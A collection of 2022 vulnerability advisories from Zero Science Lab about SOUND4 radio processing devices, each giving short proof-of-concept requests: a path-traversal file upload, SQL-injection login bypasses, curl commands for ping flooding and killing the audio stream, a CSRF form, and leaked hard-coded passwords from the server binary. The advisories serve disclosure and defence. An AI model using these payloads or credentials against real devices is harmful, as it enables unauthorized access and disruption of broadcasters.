<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Directory Traversal File Write Exploit<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application suffers from an unauthenticated directory traversal<br />file write vulnerability. Input passed through the 'filename' POST parameter<br />called by the 'upgrade.php' script is not properly verified before being used<br />to upload .upgbox Firmware files. This can be exploited to write to arbitrary<br />locations on the system via directory traversal attacks.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5730<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5730.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />POST /cgi-bin/upload.cgi HTTP/1.1<br />Host: RAAAADIOOO<br />Content-Type: multipart/form-data; boundary=----zzzzz<br />User-Agent: TheViewing/05<br />Accept-Encoding: gzip, deflate<br /><br />------zzzzz<br />Content-Disposition: form-data; name="upgfile"; filename="../../../../../../../tmp/pwned"<br />Content-Type: application/octet-stream<br /><br />t00t<br />------zzzzz<br />Content-Disposition: form-data; name="submit"<br /><br />Do it<br />------zzzzz--<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (sound4server) Hardcoded Credentials<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The server binary has hard-coded credentials within its Linux and<br />Windows distribution image. These sets of credentials are never exposed<br />to the end-user and cannot be changed through any normal operation of the<br />device. To add/modify other credentials you need to use the SOUND4 Remote<br />Control thick client.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /> Windows 10<br /> SOUND4 Server v4.1.102<br /> SOUND4 Remote Control v4.3.17<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5729<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5729.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />> grep -irnH -A2 -B2 "Password=" /opt/sound4/sound4server<br /><br />/opt/sound4/sound4server-1232889-Active=%s;<br />/opt/sound4/sound4server-1232890-<br />/opt/sound4/sound4server:1232891:ActiveOnPassword=%s;<br />/opt/sound4/sound4server-1232892-<br />/opt/sound4/sound4server-1232893-<br />--<br />/opt/sound4/sound4server-1233290-<br />/opt/sound4/sound4server-1233291-<br />/opt/sound4/sound4server:1233292:Password='hes2faB7Zub7chuF';<br />/opt/sound4/sound4server-1233293-UserType='BrokenConnection_User';<br />/opt/sound4/sound4server-1233294-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233302-<br />/opt/sound4/sound4server-1233303-more_rightusers<br />/opt/sound4/sound4server:1233304:Password='hes2faB7Zub7chuF';<br />/opt/sound4/sound4server-1233305-UserType='LocalConnection_User';<br />/opt/sound4/sound4server-1233306-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233312-<br />/opt/sound4/sound4server-1233313-_local_rds_<br />/opt/sound4/sound4server:1233314:Password='FaK7Kaph';<br />/opt/sound4/sound4server-1233315-UserType='LocalConnection_RDS';<br />/opt/sound4/sound4server-1233316-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233323-_local_vu_<br />/opt/sound4/sound4server-1233324-<br />/opt/sound4/sound4server:1233325:Password='PrE4awrE';<br />/opt/sound4/sound4server-1233326-UserType='LocalConnection_VU';<br />/opt/sound4/sound4server-1233327-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233331-_local_sw_<br />/opt/sound4/sound4server-1233332-<br />/opt/sound4/sound4server:1233333:Password='bras2awA';<br />/opt/sound4/sound4server-1233334-UserType='LocalConnection_Switch';<br />/opt/sound4/sound4server-1233335-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233340-<br />/opt/sound4/sound4server-1233341-<br />/opt/sound4/sound4server:1233342:Password='ELhp7e5DkpwVUAfJ';<br />/opt/sound4/sound4server-1233343-UserType='LocalConnection_User';<br />/opt/sound4/sound4server-1233344-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233363-<br />/opt/sound4/sound4server-1233364-<br />/opt/sound4/sound4server:1233365:Password='bDAtfKJ0';<br />/opt/sound4/sound4server-1233366-UserType='LocalConnection_FrontPanel';<br />/opt/sound4/sound4server-1233367-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233370-<br />/opt/sound4/sound4server-1233371-<user="Admin"><br />/opt/sound4/sound4server:1233372: Password="21232F297A57A5A743894A0E4A801FC3"; // admin<br />/opt/sound4/sound4server-1233373- UserType="Superadmin";<br />/opt/sound4/sound4server-1233374- CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233748-<br />/opt/sound4/sound4server-1233749-<br />/opt/sound4/sound4server:1233750:Password="SroqZQesQAJgaLF";<br />/opt/sound4/sound4server-1233751-UserType="_local_LoadPreset_";<br />/opt/sound4/sound4server-1233752-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1237511-<br />/opt/sound4/sound4server-1237512-<br />/opt/sound4/sound4server:1237513:Password="";<br />/opt/sound4/sound4server-1237514-UserType="PresetSharing";<br />/opt/sound4/sound4server-1237515-UserType="PresetSharing";<br />--<br />/opt/sound4/sound4server-1237517-CanBeModify=false;<br />/opt/sound4/sound4server-1237518-Active=false;<br />/opt/sound4/sound4server:1237519:ActiveOnPassword=true;<br />/opt/sound4/sound4server-1237520-CanBeList=false;<br />/opt/sound4/sound4server-1237521-PinEnable=false;<br /><br />---<br /><br />> C:\>strings.exe "C:\Program Files\SOUND4\Server\SOUND4 Server.exe" |findstr /spina:d "Password="<br />204080:Password="SroqZQesQAJgaLF";<br />204276:Password="";<br />204282:ActiveOnPassword=true;<br />205582:Password='bDAtfKJ0';<br />205589: Password="21232F297A57A5A743894A0E4A801FC3"; // admin<br />205594:Password='ELhp7e5DkpwVUAfJ';<br />205605:Password='PrE4awrE';<br />205611:Password='bras2awA';<br />205616:Password='hes2faB7Zub7chuF';<br />205624:Password='FaK7Kaph';<br />205683:Password='hes2faB7Zub7chuF';<br />205836:ActiveOnPassword=%s;<br />205845:Password=%s;<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (ping/traceroute) ICMP Flood Attack<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application allows an unauthenticated attacker to send network<br />signals to an arbitrary target host that can be abused in an ICMP flooding<br />attack. This includes the utilisation of the ping, traceroute and nslookup<br />commands through ping.php, traceroute.php and dns.php respectively.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5728<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5728.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />> curl -XPOST -sk https://RADIO/ping.php --data "ping_host=localhost&networkid=251" # ping -c 3 -W 5 %s<br />> curl -XPOST -sk https://RADIO/traceroute.php --data "traceroute_host=localhost&networkid=251"<br />> curl -XPOST -sk https://RADIO/dns.php --data "dns_host=localhost&networkid=251"<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Authentication Bypass<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application suffers from an SQL Injection vulnerability. Input<br />passed through the 'username' POST parameter in 'index.php' is not properly<br />sanitised before being returned to the user or used in SQL queries. This<br />can be exploited to manipulate SQL queries by injecting arbitrary SQL code<br />and bypass the authentication mechanism.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5727<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />POST /index.php HTTP/1.1<br /><br />username='+joxy--+z&password=05C13NCE<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (password) Authentication Bypass<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application suffers from an SQL Injection vulnerability. Input<br />passed through the 'password' POST parameter in 'index.php' is not properly<br />sanitised before being returned to the user or used in SQL queries. This<br />can be exploited to manipulate SQL queries by injecting arbitrary SQL code<br />and bypass the authentication mechanism.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5726<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5726.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />POST /index.php HTTP/1.1<br /><br />username=t00t&password='+joxy--+z<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Disconnect Webmonitor User (DoS)<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application allows an unauthenticated attacker to disconnect the<br />current monitoring user from listening/monitoring and takeover the radio<br />stream on a specific channel.<br /><br />------------------------------------------------------------------------<br />/var/www/killffmpeg.php:<br />------------------------<br /><br />01: <?php<br />02: $ret=0;<br />03: exec("bash -c 'kill $(cat /tmp/webplay.pid)'",$out,$ret);<br />04: echo $ret;<br />05: ?><br />------------------------------------------------------------------------<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5725<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5725.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />> curl -sko -nul https://RADIO/killffmpeg.php<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Insufficient Session Expiration<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: 4.1.102<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application suffers an insufficient session expiration. This<br />occurs when the web application permits an attacker to reuse old session<br />credentials or session IDs for authorization. Insufficient session expiration<br />increases the device's exposure to attacks that can steal or reuse user's<br />session identifiers.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5724<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5724.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />Session valid after 96 hours:<br /><br />POST /checklogin.php HTTP/1.1<br />Host: RADIO<br />Cookie: PHPSESSID=q9rooqkl3kl20aianmveimu23q; monitor-mp3-bitrate=128; monitor-volume=1; settings_accordion_active=3; netdiagsaccordion_last=0<br />Content-Length: 34<br />Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://RADIO<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://RADIO/linkandshare.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />session=q9rooqkl3kl20aianmveimu23q<br /><br /><br />HTTP/1.1 200 OK<br />Date: Sat, 03 Jan 1970 11:13:19 GMT<br />Server: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1<br />X-Powered-By: PHP/7.1.1<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Vary: User-Agent<br />Content-Length: 1<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />0<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Authorization Bypass (IDOR)<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application is vulnerable to insecure direct object references<br />that occur when the application provides direct access to objects based<br />on user-supplied input. As a result of this vulnerability attackers can<br />bypass authorization and access the hidden resources on the system and<br />execute privileged functionalities.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5723<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5723.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />(GET|POST) /** HTTP/1.1<br /><br />/var/www/:<br />----------<br /><br />.SOUND4<br />about.php<br />actioninprogress.php<br />broken_error.php<br />cfg_filewatch.xml<br />cfg_filewatch_specific.xml<br />checklogin.php<br />checkserver.php<br />config.php<br />datahandlerdlg.php<br />descrxml.php<br />dns.php<br />downloads<br />downloads.php<br />fullrebootsystem.php<br />global.php<br />globaljs.php<br />guifactorysettings.xml<br />guixml.php<br />guixml_error.php<br />header.php<br />images<br />index.php<br />isreboot.php<br />jquery-3.2.1.min.js<br />jquery-plugins<br />jquery-ui-custom<br />jquery-ui-i18n.js<br />jquery-ui.css<br />jquery-ui.js<br />jquery.js<br />jquery.ui.touch-punch.min.js<br />killffmpeg.php<br />linkandshare.php<br />login.php<br />logout.php<br />monitor.php<br />networkdiagnostic.php<br />partialrebootsystem.php<br />ping.php<br />playercfg.xml<br />rebootsystem.php<br />restoreinprogress.php<br />script.min.js<br />secure.php<br />serverinprogress.php<br />settings.php<br />setup.php<br />setup_ethernet.php<br />style.min.css<br />traceroute.php<br />upgrade<br />upgrade.php<br />upgradeinprogress.php<br />uploaded_guicustomload.php<br />uploaded_kantarlic.php<br />uploaded_licfile.php<br />uploaded_logo.php<br />uploaded_presetfile.php<br />uploaded_restorefile.php<br />uploaded_upgfile.php<br />validate_tz.php<br />ws.min.js<br />ws.php<br />wsjquery-class.min.js<br />www-data-handler.php<br /><br />/usr/cgi-bin/:<br />--------------<br /><br />(GET|POST) /** HTTP/1.1<br /><br />backup.cgi<br />cgi-form-data<br />downloadkantarlic.cgi<br />ffmpeg.cgi<br />frontpanel<br />getlogs.cgi<br />getlogszip.cgi<br />guicustomsettings.cgi<br />guicustomsettingsload.cgi<br />guifactorysettings.cgi<br />importpreset.cgi<br />loghandler.php<br />logo<br />logoremove.cgi<br />logoupload.cgi<br />phptail.php<br />printenv<br />printenv.vbs<br />printenv.wsf<br />restore.cgi<br />restorefactory.cgi<br />test-cgi<br />upgrade.cgi<br />upload.cgi<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Cross-Site Request Forgery<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application interface allows users to perform certain actions<br />via HTTP requests without performing any validity checks to verify the<br />requests. This can be exploited to perform certain actions with administrative<br />privileges if a logged-in user visits a malicious web site.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5722<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5722.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />PoC:<br />----<br /><br /><form action="http://RADIO/cgi-bin/logoremove.cgi" method="POST"><br /> <input type="submit" value="Disappear" /><br /></form><br /></code></pre>
